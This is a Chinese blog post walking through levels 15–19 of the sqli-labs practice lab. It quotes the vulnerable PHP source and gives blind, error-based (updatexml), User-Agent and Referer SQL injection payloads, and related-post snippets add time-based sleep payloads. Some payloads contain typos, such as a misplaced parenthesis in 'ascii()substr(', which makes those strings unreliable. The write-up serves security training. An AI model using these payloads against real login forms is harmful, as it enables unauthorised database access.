sqli-labs 15-19通关记录

已于 2022-04-17 13:14:41 修改
阅读量537 收藏
点赞数
文章标签: composer
于 2022-04-16 22:41:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37953087/article/details/124219342
版权

本次通关,直接从源码分析:

 

第15关:

 

本关即使输入的username和password正确,也只会显示一个成功图片。

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

我们看源码,post提交后,获取的uname,passwd没有处理,直接带入查询。

所以盲注

'or(length(database()))=8#

'or(ascii()substr((select database()),1,1))#

慢慢爆出库名

第16关:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

第十六关在post提交后,给加上了" ",并且在sql查询语句中,还额外加了(),所以和第十五关类似,只是在闭合时,我们需要加 "和)

”)or(length(database()))=8#

")or(ascii()substr((select database()),1,1))#

第17关:

$uname=check_input($_POST['uname']);  
$passwd=$_POST['passwd'];

function check_input($value)
	{
		if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		else
			{
			$value = intval($value);
			}
		return $value;
	}

 会调用check_input函数对uname进行检查过滤,但是没有对passwd过滤,所以我们在passwd处进行注入:

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

代码的查询语句,如果查询到,则进行update操作

if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		echo $update;
		mysql_query($update);
  		echo "<br>";

我们用   '   来闭和$passwd,用#来注释掉后面的内容,

1'and(updatexml(1,concat(1,(select schema_name from information_schema.schemata limit 0,1)),1))#

就可以查询到库名等数据;

第18关: 

 登陆成功会显示请求头中的user-agent:的内容

$uagent = $_SERVER['HTTP_USER_AGENT'];


if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);

会对post传进来的uname和passwd过滤

 $IP = $_SERVER['REMOTE_ADDR'];是不能伪造的,

$uagent = $_SERVER['HTTP_USER_AGENT'];所以我们只能bp抓包修改user_agent的内容

 就可以爆出库名等信息。

第19关:

 

$uagent = $_SERVER['HTTP_REFERER'];

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

第19关和第18关一样,18关是$_SERVER['HTTP_USER_AGENT'];中的内容,19关是$_SERVER['HTTP_REFERER'];中的内容,抓包改就完事了,不再赘述、

sparkerhold
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第十五和十六关(post请求-布尔盲注)
qq_42266432的博客
08-26 839
开启第十五关,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs靶场第十五关
gou1791241251的博客
12-27 943
第十五关没什么特殊的,只是单引号闭合而已。
简单语句实现用户添加、删除_useradd $uname,2024年最新完爆面试官
最新发布
2401_83739529的博客
04-21 404
注意在"$PASSWD"中切勿添加空格,否则密码中会带有空格!1.添加(删除)普通用户是要查询普通用户是否已存在。编辑shell脚本命令,实现普通用户的添加与删除。选择操作类型——添加用户/删除用户。2.添加(删除)要实现循环询问。
sqli-labs第十五关
yuqnqi的博客
05-09 835
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注。正确的时候可以直接登录,不正确的时候这里会延时 5 秒。页面无回显,单靠页面无法判断闭合方式,所以得查看源码。本关属于时间注入,基于源码分析,闭合字符是单引号。最后就是猜数据库表和猜数据库了,这里就不在叙述了。看这延迟5秒中,说明猜想数据库8位正确。
sqli-labs第15关——基于post型的时间盲注,使用sqlmap工具
m0_73752956的博客
08-29 408
本关属于时间注入,基于源码分析,闭合字符是单引号。由于过程较复杂,这里使用sqlmap跑数据。这样我们就跑完了所有数据。
sqli-labs (less-15)
kukudeshuo的博客
03-09 379
sqli-labs (less-15) 进入15关,输入用户名和密码,登入后发现没有数据返回 输入 uname=admin'&passwd=admin&submit=Submit #没有错误显示 uname=admin"&passwd=admin&submit=Submit #没有错误显示 这里我们发现我们不管我们输入什么都是没有错误信息显示的,这里我们可以使用时间盲注的方法判断注入点 uname=admin' and sleep(5)#&passwd=admi
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs的第15关的布尔脚本(附代码分析)
skoyine的博客
05-02 1445
sqli-labs的第15关布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
Sqlilabs-15
KAKA的博客
07-07 831
这一关来到了第 15 关,值得注意的是,这一关是布尔和时间盲注的结合关,很好玩哦~ 因为有时间盲注,这里就直接上菜了,下面是几个例子 –查表 uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查列 uname=admin' a
sqli-labs靶场15-19关通关笔记中总结
weixin_45585955的博客
04-16 3779
第十五关 本关属于时间注入,基于源码分析,闭合字符是单引号。 本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句。 那这里对 id 进行 ‘ id’ 的处理。 本关我们利用延时注入进行。 uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit 正确的时候可以直接登录,不正确的时候这里会延时 5 秒。 第十六关
SQLi LABS Less 15 布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十五关,SQLi-LABS Less-15,SQLi-LABS Less 15,SQLiLABS Less15,SQLi Less 15
sqli-labs 15-19通关
weixin_52029251的博客
04-18 211
sqli 不管输入什么都没有回显 查看源码 发现报错语句都被注释掉了,抓包使用延时注入试试 发送之后十秒之后才给回应,明显注入成功。 第十六关 和第十五关大同小异 ,只不过是闭合方式不同 闭合方式") 第十七关 还是输入什么都没有回显,查看源码 从源码可以看出只能从passwd注入 对password注入发现回显 之后使用updatexml()进行注入就可以了 第十八关 这关将username和password都进行了过滤,查看源码之后发现有user..
sqli-labs-master第15、16关
m_ing
05-13 2131
前言:在第九关我们已经了解过GET方式的盲注,我们今天一起探讨下POST方式的盲注。 第15关 http://192.168.89.134/sqli-labs-master/Less-15/ 我们在尝试了,联合查询和报错注入方式后无果,我们初步判断为盲注 我们看下源代码: 猜想正确 我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。) admin’ and if(lengt
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3039
sqli-labs靶场过关 源码分析
sqli-labs(15-19关)笔记
博客
04-17 2795
15关 查看源码如下: 这里看护出是用post提交的参数,下面把回显报错给注释掉了,现在得知我们只能用延时注入
sqli-labs通关28
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值